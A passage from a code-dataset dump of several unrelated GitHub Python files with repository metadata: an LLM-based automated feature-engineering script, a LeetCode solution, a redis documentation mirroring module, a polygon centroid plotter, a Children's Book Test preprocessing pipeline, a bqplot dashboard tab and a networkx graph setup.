attributes.\nDescription of the dataset in `df` (column dtypes might be inaccurate):\n\"{data_description_unparsed}\"\n\nColumns in `df` (true feature dtypes listed here, categoricals encoded as int):\n{samples}\n \nThis code was written by an expert datascientist working to improve predictions. It is a snippet of code that adds new columns to the dataset.\nNumber of samples (rows) in training dataset: {int(len(df))}\n \nThis code generates additional columns that are useful for a downstream classification algorithm (such as XGBoost) predicting \\\"{ds[4][-1]}\\\".\nAdditional columns add new semantic information, that is they use real world knowledge on the dataset. They can e.g. be feature combinations, transformations, aggregations where the new column is a function of the existing columns.\nThe scale of columns and offset does not matter. Make sure all used columns exist. Follow the above description of columns closely and consider the datatypes and meanings of classes.\nThis code also drops columns, if these may be redundant and hurt the predictive performance of the downstream classifier (Feature selection). 
Dropping columns may help as the chance of overfitting is lower, especially if the dataset is small.\nThe classifier will be trained on the dataset with the generated columns and evaluated on a holdout set. The evaluation metric is accuracy. The best performing code will be selected.\nAdded columns can be used in other codeblocks, dropped columns are not available anymore.\n\nCode formatting for each added column:\n```python\n# (Feature name and description)\n# Usefulness: (Description why this adds useful real world knowledge to classify \\"{ds[4][-1]}\\" according to dataset description and attributes.)\n# Input samples: (Three samples of the columns used in the following code, e.g. '{df.columns[0]}': {list(df.iloc[:3, 0].values)}, '{df.columns[1]}': {list(df.iloc[:3, 1].values)}, ...)\n(Some pandas code using '{df.columns[0]}', '{df.columns[1]}', ... to add a new column for each row in df)\n```end\n\nCode formatting for dropping columns:\n```python\n# Explanation why the column XX is dropped\ndf.drop(columns=['XX'], inplace=True)\n```end\n\nEach codeblock ends with ```end and starts with \"```python\"\nEach codeblock either generates {how_many} or drops bad columns (Feature selection).\nCodeblock:\n\"\"\"\n\n\ndef build_prompt(ds, df, iterative=1):\n data_description_unparsed = ds[-1]\n feature_importance = {} # xgb_eval(_obj)\n\n samples = \"\"\n df_ = df.head(10)\n for i in list(df_):\n # show the list of values\n nan_freq = \"%s\" % float(\"%.2g\" % (df[i].isna().mean() * 100))\n s = df_[i].tolist()\n if str(df[i].dtype) == \"float64\":\n s = [round(sample, 2) for sample in s]\n samples += (\n f\"{df_[i].name} ({df[i].dtype}): NaN-freq [{nan_freq}%], Samples {s}\\n\"\n )\n\n kwargs = {\n \"data_description_unparsed\": data_description_unparsed,\n \"samples\": samples,\n \"feature_importance\": {\n k: \"%s\" % float(\"%.2g\" % feature_importance[k]) for k in feature_importance\n },\n }\n\n prompt = get_prompt(\n df,\n ds,\n data_description_unparsed=data_description_unparsed,\n iterative=iterative,\n samples=samples,\n )\n\n return prompt\n\n\ndef generate_features(\n ds,\n df,\n model=\"gpt-3.5-turbo\",\n just_print_prompt=False,\n iterative=1,\n metric_used=None,\n iterative_method=\"logistic\",\n display_method=\"markdown\",\n):\n if display_method == \"markdown\":\n from IPython.display import display, Markdown\n\n def format_for_display(code):\n code = code.replace(\"```python\", \"\").replace(\"```\", \"\").replace(\"\", \"\")\n return code\n\n display_method = lambda x: display(Markdown(x))\n else:\n display_method = print\n\n assert (\n iterative == 1 or metric_used is not None\n ), \"metric_used must be set if iterative\"\n\n # Split ds into ds_train and ds_valid (disjoint 70/30 split)\n if iterative > 1:\n df_train, df_valid = (\n df.iloc[: int(len(df) * 0.7)],\n df.iloc[int(len(df) * 0.7) :],\n )\n else:\n df_train, df_valid = df, None\n\n prompt = build_prompt(ds, df_train, iterative=iterative)\n\n if just_print_prompt:\n code, prompt = None, prompt\n return code, prompt, None\n\n messages = [\n {\n \"role\": \"system\",\n \"content\": \"You are an expert data scientist assistant solving Kaggle problems. You answer only by generating code. 
Answer as concisely as possible.\",\n },\n {\n \"role\": \"user\",\n \"content\": prompt,\n },\n ]\n display_method(f\"*Dataset description:*\\n {ds[-1]}\")\n\n n_iter = iterative\n full_code = \"\"\n for i in range(n_iter):\n try:\n completion = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n stop=[\"```end\"],\n temperature=0.5,\n max_tokens=500,\n )\n code = completion[\"choices\"][0][\"message\"][\"content\"]\n code = code.replace(\"```python\", \"\").replace(\"```\", \"\").replace(\"\", \"\")\n except Exception as e:\n display_method(\"Error in code generation.\" + str(e))\n continue\n\n if iterative:\n df_train_extended = copy.deepcopy(df_train)\n df_valid_extended = copy.deepcopy(df_valid)\n try:\n df_train_extended = run_llm_code(\n code,\n df_train_extended,\n )\n df_valid_extended = run_llm_code(\n code,\n df_valid_extended,\n )\n\n result_old = evaluate_dataset(\n ds=ds,\n df_train=df_train,\n df_test=df_valid,\n prompt_id=\"XX\",\n name=ds[0],\n method=iterative_method,\n metric_used=metric_used,\n seed=0,\n )\n\n result_extended = evaluate_dataset(\n ds=ds,\n df_train=df_train_extended,\n df_test=df_valid_extended,\n prompt_id=\"XX\",\n name=ds[0],\n method=iterative_method,\n metric_used=metric_used,\n seed=0,\n )\n except Exception as e:\n display_method(\"Error in code execution.\")\n messages += [\n {\"role\": \"assistant\", \"content\": code},\n {\n \"role\": \"user\",\n \"content\": f\"\"\"Code execution of {code} failed with error: {e}. Next feature:\n ```python\n \"\"\",\n },\n ]\n continue\n\n # importances = get_leave_one_out_importance(\n # df_train_extended,\n # df_valid_extended,\n # ds,\n # iterative_method,\n # metric_used,\n # )\n # \"\"\"ROC Improvement by using each feature: {importances}\"\"\"\n\n improvement_roc = result_extended[\"roc\"] - result_old[\"roc\"]\n improvement_acc = result_extended[\"acc\"] - result_old[\"acc\"]\n\n add_feature = True\n add_feature_sentence = (\n \"The code was executed and changes to ´df´ were retained.\"\n )\n if improvement_roc + improvement_acc < 0:\n add_feature = False\n add_feature_sentence = f\"The last code changes to ´df´ were discarded. (Improvement: {improvement_roc + improvement_acc})\"\n\n display_method(\n \"\\n\"\n + f\"*Iteration {i+1}*\\n\"\n + f\"```python\\n{format_for_display(code)}\\n```\\n\"\n + f'Performance before adding features ROC {result_old[\"roc\"]:.3f}, ACC {result_old[\"acc\"]:.3f}.\\n'\n + f'Performance after adding features ROC {result_extended[\"roc\"]:.3f}, ACC {result_extended[\"acc\"]:.3f}.\\n'\n + f\"Improvement ROC {improvement_roc:.3f}, ACC {improvement_acc:.3f}.\\n\"\n + f\"{add_feature_sentence}\\n\"\n + f\"\\n\"\n )\n\n if len(code) > 10:\n messages += [\n {\"role\": \"assistant\", \"content\": code},\n {\n \"role\": \"user\",\n \"content\": f\"\"\"Performance after adding feature ROC {result_extended[\"roc\"]:.3f}, ACC {result_extended[\"acc\"]:.3f}. 
{add_feature_sentence}\nNext codeblock:\n\"\"\",\n },\n ]\n if add_feature or iterative == 1:\n df_train = df_train_extended\n df_valid = df_valid_extended\n full_code += code\n\n # if just_print_prompt:\n # code, prompt = None, howto_prompt.get_prompt(**kwargs)\n # else:\n # code, prompt = howto_prompt.get_prompt(**kwargs), howto_prompt(**kwargs)\n\n return full_code, prompt, messages\n","repo_name":"noahho/CAFE_Automated_Feature_Engineering","sub_path":"cafe.py","file_name":"cafe.py","file_ext":"py","file_size_in_byte":9662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18319705129","text":"# A valid parentheses string is either empty (\"\"), \"(\" + A + \")\", or A + B, where A and B are valid parentheses strings, and + represents string concatenation. \r\n\r\n# For example, \"\", \"()\", \"(())()\", and \"(()(()))\" are all valid parentheses strings.\r\n\r\n# A valid parentheses string S is primitive if it is nonempty, and there does not exist a way to split it into S = A+B, with A and B nonempty valid parentheses strings.\r\n\r\n# Given a valid parentheses string S, consider its primitive decomposition: S = P_1 + P_2 + ... + P_k, where P_i are primitive valid parentheses strings.\r\n\r\n# Return S after removing the outermost parentheses of every primitive string in the primitive decomposition of S.\r\n\r\nclass Solution(object):\r\n def removeOuterParentheses(self, S):\r\n list_stack = []\r\n count = 0\r\n for char in S:\r\n if char == \"(\":\r\n if count > 0:\r\n list_stack.append(char)\r\n count += 1\r\n if char == \")\":\r\n if count > 1:\r\n list_stack.append(char)\r\n count -= 1\r\n return \"\".join(list_stack)\r\n\r\n# learned how to use join! It's a bit weird compared to javascript","repo_name":"SLarkworthy/CodeChallenges","sub_path":"LeetCode/Stacks/removeOuterPeren.py","file_name":"removeOuterPeren.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17571941686","text":"#!/usr/bin/env python\n# coding: utf-8\n# yc@2013/03/20\n\n'''\nFor projects that are neither standard github/svn projects nor single HTML\ndocuments, as long as they have online documentation to browse, this ultimate\nwget-mirroring trick can capture them.\n'''\n\nimport os\nimport re\nfrom offlinedoc.module._base import BaseModule, Version\n\n\nclass Module(BaseModule):\n '''\n '''\n # unique id (format rules are the same as for Linux file names)\n name = 'redis'\n # homepage, used to fetch the favicon (can be None if there is none)\n homepage = 'http://redis.io/'\n # versioning type\n # normal: incremental, keep all versions (e.g. bootstrap)\n # latest: incremental, keep only the latest version (e.g. jquery)\n # single: fetch only once, whether new or old (e.g. sed)\n versioning = 'latest'\n\n def _new_versions(self, cur_ver):\n versions = [\n Version(i)\n for i in re.findall(r'http://download.redis.io/releases/redis-([\\.\\d]+).tar.gz', self.http_get(self.homepage))\n ]\n return [i for i in versions if i > cur_ver]\n\n def post_update(self, version, ret=None):\n '''\n Must return the path of a directory containing the generated HTML docs\n '''\n # first empty our own source directory\n self.clear_source()\n # then wget-mirror into the source directory, restricted to links under redis.io\n ret = self.wget_mirror('http://redis.io/', self.source_dir, \\\n domains='redis.io')\n # if wget succeeded, first strip the external embeds from the html (they slow\n # down browsing), then return the source directory (with the generated HTML docs)\n if ret[0] in (0, 8):\n self.shell(r'find %s -name \"*.html\" -exec '\n 'sed -i \"/disqus.com\\/embed.js/d\" '\n '{} \\;' % self.source_dir)\n return self.source_dir\n","repo_name":"cj1324/OfflineDoc","sub_path":"offlinedoc/module/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"37"} 
+{"seq_id":"12727127945","text":"# _ _ _ _ _ _ _ _ _ _ _ _\n# (c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c)\n# / ._. \\ / ._. \\ / ._. \\ / ._. \\ / ._. \\ / ._. \\\n# __\\( Y )/__ __\\( Y )/__ __\\( Y )/__ __\\( Y )/__ __\\( Y )/__ __\\( Y )/__\n# (_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)(_.-/'-'\\-._)\n# || O || || O || || O || || O || || O || || O ||\n# _.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._\n# (.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)(.-./`-'\\.-.)\n# `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-'\n\n###########################################################################\n# Author: Matt Fletcher #\n# PID: None #\n# Class: MAE273 Statics \t #\n# Helpers: None #\n# #\n# Program: Centroid of Polygon Calculator #\n# Due Date: #\n# #\n# Language: Python 2.7.6 #\n# IDE: Python in Terminal #\n# #\n# Purpose: Given XY Coordinates for a shape, calculates the centroid #\n# #\n# \"Bugs\": Points come out skewed and flipped #\n# \"Undocumented features\": None. #\n###########################################################################\n\n#The change in this from the previous program is using an equation for the centroid of an N-sided polygon\n#Link is here https://en.wikipedia.org/wiki/Centroid#Centroid_of_a_polygon\n\n#####################################################\n# Imports\t\t\t\t\t\t#\n#####################################################\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\n\n\n#####################################################\n# Setup\t\t\t \t\t#\n#####################################################\n\n#Set empty list for coordinates\nx,y =[],[]\n\n#Importing csv data \nwith open(\"russiadata.csv\", \"r\") as russiadataFile:\n\trussiadataReader = csv.reader(russiadataFile)\n\t\n\t#Create list of points\n\trussiadatalist = []\n\n\t#Import data\n\tfor row in russiadataReader:\n\t\t#While the rows have data, AKA length not equal to zero. \n\t\tif len(row) != 0: \n\t\t\t#Append data to arrays created above\n\t\t\tx.append(float(row[0]))\n\t\t\ty.append(float(row[1]))\n\n#Close file as importing is done\nrussiadataFile.close\n\n\n\n\n#####################################################\n# Data Analysis\t\t\t\t\t#\n#####################################################\n\n#Convert list to array for computations\nx=np.array(x)\ny=np.array(y)\n\n\n\n#Initialize area and x,y centroid to 0 for iteration. 
\narea = 0\nc_x = 0\nc_y = 0\n#For loop using equation from wikipedia\n\n#Area of polygon \nfor i in range(len(x)-1):\n\tarea_i = 0.5 * ((x[i] * y[i+1]) - (x[i+1]*y[i]))\n\tarea = area + area_i\n\n\nfor i in range(len(x)-1):\n\tc_xi = (x[i]+x[i+1]) * (x[i]*y[i+1] - x[i+1]*y[i])\n\tc_x = c_x+c_xi\n\nc_x = c_x/(6*area)\n\nfor i in range(len(y)-1):\n\tc_yi = (y[i]+y[i+1]) * (y[i]*x[i+1] - y[i+1]*x[i])\n\tc_y = c_y+c_yi\nc_y = c_y/(6*area)\n\n\nprint('Centroid is at (%f, %f)' % (c_x, c_y))\n\n#####################################################\n# Plotting \t\t\t\t\t#\n#####################################################\n\n\n#Plot all points in data\nplt.xkcd()\nplt.plot(x,y, \"-.\")\n\n#Plot centroid and label it\nplt.plot(c_x,c_y,'^')\n\n\nplt.ymax=max(x)\n#Add axis labels\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"russia\")\n\n#Show the plot\nplt.show()\n\n\n\n\n\n#Use this to convert image to xy points\n#http://imagej.1557.x6.nabble.com/Obtaining-X-Y-coordinates-from-an-image-td3692369.html\n","repo_name":"MatthewFletcher/centroid","sub_path":"xypolygon.py","file_name":"xypolygon.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14210611832","text":"import sys\nsys.path.append('../../')\n\nfrom tasks.cbt.pipeline import *\nfrom tasks.cbt.modules import *\nfrom tproc.utils import *\nfrom tasks.cbt.dictionary import Dictionary\n\nfrom tqdm import tqdm\n\nimport re\n\n\nFIELDS = [ 'context', 'query', 'answer', 'candidates' ]\n#DSETS = [ 'train', 'test', 'valid' ]\nDSETS = [ 'test', 'valid' ]\n#DSETS = [ 'valid' ]\nPICKLES = [ 'data.NE', 'lookup.NE', 'metadata.NE' ]\n\nPATH = '../../../datasets/CBTest/data/'\n\n\n# separate items from text\ndef _read_sample(sample):\n lines = sample.splitlines()\n context = ''\n for line in lines[:-1]:\n context += line.lstrip('0123456789')\n query = lines[-1].split('\\t')[0].lstrip('21')\n candidates = lines[-1].split('\\t')[-1]\n answer = lines[-1].split('\\t')[1]\n return context, query, candidates, answer\n\n\n# read from file\n# returns structured text\ndef fetch_samples(path):\n # open file\n with open(path) as f:\n #raw_data = rtext_pipeline(f.read())\n raw_data = f.read()\n samples = raw_data.split('\\n\\n')[:-1]\n\n return samples\n\n# text sample to data item\ndef process_sample(sample, lookup, candidate_lookup):\n \n vocab = lookup.i2w\n # get candidates\n candidates = sample.splitlines()[-1].split('\\t')[-1].split('|')\n answer = sample.splitlines()[-1].split('\\t')[1].strip()\n\n # filter candidates\n candidates = [ w for w in candidates if lookup.is_worthy(w) ]\n\n # update vocab\n for w in candidates:\n if w not in vocab and lookup.is_worthy(w):\n vocab.append(w)\n\n # add unk to candidates to keep shape at 10\n candidates = candidates + ['UNK']*(10 - len(candidates))\n\n # build word to index\n # w2i = { w:i for i,w in enumerate(vocab) }\n\n # assign special tokens to candidates\n for w in candidates:\n token_w = 'cand' + str(vocab.index(w))\n candidate_lookup[token_w] = w\n sample = sample.replace(w, token_w)\n\n #sample = rtext_pipeline(sample)\n\n # update vocabulary\n # obtain words from string(sample)\n # split sample into story and query\n story = ' '.join([ line.lstrip('0123456789') for line in sample.splitlines()[:-1] ])\n query = sample.splitlines()[-1].split('\\t')[0].lstrip('21')\n\n # run through raw text pipeline\n story = rtext_pipeline(story)\n query = rtext_pipeline(query)\n\n\n for w in (story + ' ' + query).split():\n 
if w not in vocab:\n if re.match('cand\\d+', w):\n continue\n vocab.append(w)\n\n #update the global lookup database\n lookup.i2w = vocab\n \n # vectorize sample\n data = {\n 'context' : vectorize_tree(story.split(), lookup),\n 'query' : vectorize_tree(query.split(), lookup),\n 'candidates' : vectorize_tree(candidates, lookup),\n 'answer' : vectorize_tree(answer, lookup)\n }\n\n # replace special tokens in vocab with actual words\n #for token, w in candidate_lookup.items():\n # vocab[vocab.index(token)] = w\n\n return data, lookup, candidate_lookup\n\n\n# init metadata\ndef init_metadata():\n return { \n 'max_candidates' : 10,\n 'clen' : 0,\n 'qlen' : 0\n }\n\n# update metadata\ndef update_metadata(metadata, data_item):\n metadata.update( {\n 'clen' : max(metadata['clen'], len(data_item['context'])),\n 'qlen' : max(metadata['qlen'], len(data_item['query']))\n } )\n return metadata\n\n\ndef process_file(filepath, lookup, metadata):\n # fetch samples from file\n samples = fetch_samples(filepath)\n\n # maintain vocabulary\n candidate_lookup = {}\n\n data = {}\n for k in FIELDS:\n data[k] = []\n\n # iterate through samples\n for sample in tqdm(samples):\n data_item, lookup, candidate_lookup = process_sample(sample,\n lookup, candidate_lookup)\n\n # update metadata\n metadata = update_metadata(metadata, data_item)\n\n for k in FIELDS:\n data[k].append(data_item[k])\n\n return data, lookup, metadata\n\n\ndef process():\n\n # currently we are working only on named entities\n filepath = {\n 'train' : '../../../datasets/CBTest/data/cbtest_NE_train.txt',\n 'test' : '../../../datasets/CBTest/data/cbtest_NE_valid_2000ex.txt',\n 'valid' : '../../../datasets/CBTest/data/cbtest_NE_test_2500ex.txt'\n }\n\n # maintain\n # 1. data\n # 2. (update) lookup -> vocabulary\n # 3. 
(update) metadata\n # for each tag (train, test, valid)\n data, metadata = {}, init_metadata()\n vocab = ['PAD', 'UNK']\n lookup = Dictionary(vocab)\n for tag in DSETS:\n data_, lookup, metadata = process_file(filepath[tag], lookup, metadata)\n data[tag] = data_\n\n # update lookup size in metadata\n metadata['vocab_size'] = len(lookup.i2w)\n\n # create w2i and i2w\n w2i = { w:i for i,w in enumerate(lookup.i2w) }\n\n lookup = { 'w2i' : w2i, 'i2w' : lookup.i2w }\n\n # save to disk\n serialize(data, PATH + 'data.NE')\n serialize(lookup, PATH + 'lookup.NE')\n serialize(metadata, PATH + 'metadata.NE')\n\n return data, lookup, metadata\n\n\ndef pad_data(data, metadata, truncate=False):\n\n clen = metadata['clen']\n qlen = metadata['qlen']\n\n padded_data = {}\n\n # for [train, test, valid]\n for dset in DSETS:\n # pad each field\n #padded_data[dset] = { k: pad_seq(v) for k,v in data[dset].items() }\n padded_data[dset] = sort_data({\n 'context' : pad_seq(data[dset]['context'], clen, \n truncate=True),\n 'query' : pad_seq(data[dset]['query'], qlen, \n truncate=True),\n 'answer' : pad_seq(reindex_answer(data[dset]['answer'], \n data[dset]['candidates'])),\n 'candidates' : pad_seq(data[dset]['candidates'], \n 10, truncate=True)\n })\n\n # add candidate mask over context\n padded_data[dset]['cmask'] = candidate_mask(padded_data[dset]['context'],\n padded_data[dset]['candidates'])\n\n return padded_data\n\n\ndef gather():\n\n for pickle_file in PICKLES:\n if not os.path.isfile(PATH + pickle_file):\n data, lookup, metadata = process()\n\n else:\n data, lookup, metadata = [read_pickle(PATH + pfile) \n for pfile in PICKLES]\n\n return pad_data(data, metadata), lookup, metadata\n\n\n\nif __name__ == '__main__':\n # run process -> get data\n process()\n","repo_name":"ai-guild/tensorsoup","sub_path":"tensorsoup/tasks/cbt/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"14527394237","text":"from bqplot import (OrdinalScale, LinearScale, Bars, Lines, Label, Figure, Axis, ColorScale, CATEGORY10, ColorScale)\nimport ipywidgets as widgets\nimport bqplot as bqp\nimport pandas as pd\nimport numpy as np\n\nclass Tab1:\n \n def __init__(self, df):\n \n self.df = df\n self.widgets = dict() #dropdown and figs\n self.paras = dict() #X and Y\n \n self._init_update() \n\n \n \n def _init_update(self):\n \n self.widgets['dropdown'] = widgets.Dropdown(description='Frequency', options=['Year', 'Quarter', 'Month'])\n self.widgets['dropdown'].value = 'Year'\n self.widgets['dropdown'].observe(self._plot_update, 'value')\n \n self._data_process(self.df)\n \n self._plot_fig11(self.paras['plt_year_class_x'], self.paras['plt_year_y'])\n self._plot_fig12(self.paras['plt_year_class_x'], self.paras['plt_year_class_y'], \n self.paras['df_year_class'])\n \n self.widgets['tab1'] = widgets.VBox([self.widgets['dropdown'],\n self.widgets['fig11']\n ,self.widgets['fig12']\n ])\n \n \n \n def _data_process(self, df):\n \n self.paras['df_year_class'] = pd.pivot_table(df, values='Transaction Id', \n index=['by_yr'], columns=['Class Number'],\n aggfunc='count', fill_value=0)\n self.paras['df_qrt_class'] = pd.pivot_table(df, values='Transaction Id', \n index=['by_qrt'], columns=['Class Number'],\n aggfunc='count', fill_value=0)\n self.paras['df_mon_class'] = pd.pivot_table(df, values='Transaction Id', \n index=['by_mon'], columns=['Class Number'],\n aggfunc='count', fill_value=0)\n \n \n# 
self.paras['plt_year_class_x'] = self.paras['df_year_class'].index.strftime('%Y')\n self.paras['plt_year_class_x'] = np.array(list(self.paras['df_year_class'].index))\n self.paras['plt_year_class_y'] = np.array(self.paras['df_year_class']).T\n self.paras['plt_year_y'] = np.array(self.paras['df_year_class']).sum(axis=1)\n\n# self.paras['plt_qrt_class_x'] = self.paras['df_qrt_class'].index.strftime('%YQ%q')\n self.paras['plt_qrt_class_x'] = np.array(list(self.paras['df_qrt_class'].index))\n self.paras['plt_qrt_class_y'] = np.array(self.paras['df_qrt_class']).T\n self.paras['plt_qrt_y'] = np.array(self.paras['df_qrt_class']).sum(axis=1)\n\n# self.paras['plt_mon_class_x'] = self.paras['df_mon_class'].index.strftime('%Y-%m')\n self.paras['plt_mon_class_x'] = np.array(list(self.paras['df_mon_class'].index))\n self.paras['plt_mon_class_y'] = np.array(self.paras['df_mon_class']).T\n self.paras['plt_mon_y'] = np.array(self.paras['df_mon_class']).sum(axis=1)\n \n\n \n \n \n def _plot_fig11(self, plt_x, plt_y):\n \n x_ord = OrdinalScale(domain=list(plt_x))\n y_sc = LinearScale(max=plt_y.max()*1.1)\n \n plot11 = Bars(x=plt_x, y=plt_y, scales={'x':x_ord, 'y':y_sc}, colors=['#3399ff'],\n tooltip=bqp.Tooltip(fields=['x', 'y'], labels=['Date', 'Reads']))\n plot11.stroke = 'black'\n plot11.align = 'center'\n \n mark_text = Label(x=plt_x,\n y=plt_y,\n align='middle',\n font_weight='normal',\n y_offset=-10,\n colors=['white'],\n default_size=12,\n scales={'x': x_ord, 'y': y_sc},\n text=plt_y #[value for value in bar_label]\n )\n \n xax11 = Axis(scale=x_ord, grid_lines='none', num_ticks=10)\n yax11 = Axis(scale=y_sc, tick_format=',d', grid_lines='none', orientation='vertical')\n \n #Axis(**kwargs)\torientation, side, label, tick_format, scale, num_ticks, \n #tick_values, label_location, label_color, grid_lines, grid_color, color, label_offset, visible\n \n self.widgets['fig11'] = Figure(marks=[plot11, mark_text], axes=[xax11, yax11], padding_x=0.025, padding_y=0.025)\n self.widgets['fig11'].layout.width = '800px'\n self.widgets['fig11'].layout.height = '300px'\n self.widgets['fig11'].title = 'Readership data by Year'\n \n \n\n def _plot_fig12(self, plt_x, plt_y, df_year_class):\n \n x_ord = OrdinalScale()\n y_sc = LinearScale()\n \n #The 'marker' trait of a Lines instance must be any of \n #['circle', 'cross', 'diamond', 'square', 'triangle-down', 'triangle-up', 'arrow', 'rectangle', 'ellipse'] or None\n plot12 = Lines(x=plt_x, y=plt_y, scales={'x':x_ord, 'y':y_sc}, \n tooltip=bqp.Tooltip(fields=['x', 'y'], labels=['Date', 'Reads']),\n colors=CATEGORY10, marker='circle',\n display_legend=True,\n labels=['Class ' + s for s in df_year_class.columns])\n\n #Axes\n xax11 = Axis(scale=x_ord, grid_lines='none', num_ticks=10)\n yax11 = Axis(scale=y_sc, tick_format=',d', grid_lines='none', orientation='vertical') \n \n #Axis(**kwargs)\torientation, side, label, tick_format, scale, num_ticks, \n #tick_values, label_location, label_color, grid_lines, grid_color, color, label_offset, visible\n \n self.widgets['fig12'] = Figure(marks=[plot12], axes=[xax11, yax11], padding_x=0.025, padding_y=0.025)\n \n self.widgets['fig12'].layout.width = '800px'\n self.widgets['fig12'].layout.height = '300px'\n \n\n def _plot_update(self, *args): #only consider change frequency\n selected_freq = self.widgets['dropdown'].value\n\n # update the y attribute of the mark by selecting \n # the column from the price data frame\n try:\n if selected_freq == 'Year':\n self.widgets['fig11'].axes[0].scale.domain = 
list(self.paras['plt_year_class_x'])\n self.widgets['fig11'].axes[1].scale.max=self.paras['plt_year_y'].max()*1.1\n self.widgets['fig11'].marks[1].x = self.paras['plt_year_class_x']\n self.widgets['fig11'].marks[1].y = self.paras['plt_year_y']\n self.widgets['fig11'].marks[1].text = self.paras['plt_year_y']\n self.widgets['fig11'].marks[0].x = self.paras['plt_year_class_x']\n self.widgets['fig11'].marks[0].y = self.paras['plt_year_y']\n self.widgets['fig12'].marks[0].x = self.paras['plt_year_class_x']\n if len(self.paras['plt_year_class_x'])>1:\n self.widgets['fig12'].marks[0].y = self.paras['plt_year_class_y']\n else:\n self.widgets['fig12'].marks[0].y = self.paras['plt_year_class_y'][0]\n elif selected_freq == 'Quarter':\n self.widgets['fig11'].axes[0].scale.domain = list(self.paras['plt_qrt_class_x'])\n self.widgets['fig11'].axes[1].scale.max=self.paras['plt_qrt_y'].max()*1.1\n self.widgets['fig11'].marks[1].x = self.paras['plt_qrt_class_x']\n self.widgets['fig11'].marks[1].y = self.paras['plt_qrt_y']\n self.widgets['fig11'].marks[1].text = self.paras['plt_qrt_y']\n self.widgets['fig11'].marks[0].x = self.paras['plt_qrt_class_x']\n self.widgets['fig11'].marks[0].y = self.paras['plt_qrt_y']\n self.widgets['fig12'].marks[0].x = self.paras['plt_qrt_class_x']\n self.widgets['fig12'].marks[0].y = self.paras['plt_qrt_class_y']\n elif selected_freq == 'Month':\n self.widgets['fig11'].axes[0].scale.domain = list(self.paras['plt_mon_class_x'])\n self.widgets['fig11'].axes[1].scale.max=self.paras['plt_mon_y'].max()*1.1\n self.widgets['fig11'].marks[1].x = self.paras['plt_mon_class_x']\n self.widgets['fig11'].marks[1].y = self.paras['plt_mon_y']\n self.widgets['fig11'].marks[1].text = self.paras['plt_mon_y']\n self.widgets['fig11'].marks[0].x = self.paras['plt_mon_class_x']\n self.widgets['fig11'].marks[0].y = self.paras['plt_mon_y']\n self.widgets['fig12'].marks[0].x = self.paras['plt_mon_class_x']\n self.widgets['fig12'].marks[0].y = self.paras['plt_mon_class_y']\n except:\n pass\n finally:\n # update the title of the figure\n if selected_freq == 'Year':\n self.widgets['fig12'].marks[0].labels = ['Class ' + s for s in self.paras['df_year_class'].columns]\n elif selected_freq == 'Quarter':\n self.widgets['fig12'].marks[0].labels = ['Class ' + s for s in self.paras['df_qrt_class'].columns]\n elif selected_freq == 'Month':\n self.widgets['fig12'].marks[0].labels = ['Class ' + s for s in self.paras['df_mon_class'].columns]\n self.widgets['fig11'].title = 'Readership data by {}'.format(selected_freq)\n# self.widgets['fig11'].marks[1].align = \"middle\"\n \n \n def _plot_fig1_update(self, df): #consider change year, class\n \n self._data_process(df)\n self._plot_update()\n \n \n def show(self):\n return self.widgets['tab1']\n \n ","repo_name":"angang0123/my_project","sub_path":"Usage/Scripts/tab1.py","file_name":"tab1.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6492566147","text":"import networkx as nx\nimport numpy as np\nimport itertools\nimport matplotlib.pyplot as plt\nimport gym\nimport ql\nimport time\n\nG1=nx.DiGraph()\nlist_nodes = [1,2,3,4,5,6,7,8,9,10] #### pocisiones [0,1,2,3,4]\nacciones = list_nodes\nActionsx1= [2,3] #### acciones posibles para cada nodo\nActionsx2= [2,5]\nActionsx3= [0,1,3,4,5]\nActionsx4= [0,2,4,6,7]\nActionsx5= [2,3,5,7,8]\nActionsx6= [1,2,4,8,9]\nActionsx7= [3,7]\nActionsx8= [3,4,6,8]\nActionsx9= [4,5,7,9]\nActionsx10= 
[5,8]\n\nG1.add_nodes_from(list_nodes)\nG1.nodes()\n\n#weights = [50,90,50,90,50,50,50,50,50,50,50,50,50,50,50,50,50,50]\nweights = [50,90,50,90,50,90,50,50,50,90,50,50,50,50,90,50,50,50]\nlist_arcs1 = [(1,3,weights[0]), (3,1,weights[0]), (1,4,weights[1]) , (4,1,weights[1]) , (2,3,weights[2]), (3,2,weights[2]) , (2,6,weights[3]) , (6,2,weights[3]) , (3,4,weights[4]) , (4,3,weights[4]) , (3,5,weights[5]) , (5,3,weights[5]) , (3,6,weights[6]) , (6,3,weights[6]) ,(4,5,weights[7]), (5,4,weights[7]), (5,6,weights[8]), (6,5,weights[8]), (4,7,weights[9]), (7,4,weights[9]), (4,8,weights[10]), (8,4,weights[10]), (5,8,weights[11]), (8,5,weights[11]), (5,9,weights[12]), (9,5,weights[12]), (6,9,weights[13]), (9,6,weights[13]), (6,10,weights[14]), (10,6,weights[14]), (7,8,weights[15]), (8,7,weights[15]), (8,9,weights[16]), (9,8,weights[16]), (9,10,weights[17]), (10,9,weights[17])]\nG1.add_weighted_edges_from(list_arcs1)\nG1.edges()\n\nG1.nodes[1]['pos'] = (0,-2)\nG1.nodes[2]['pos'] = (0,2)\nG1.nodes[3]['pos'] = (2.5,0)\nG1.nodes[4]['pos'] = (5,-5)\nG1.nodes[5]['pos'] = 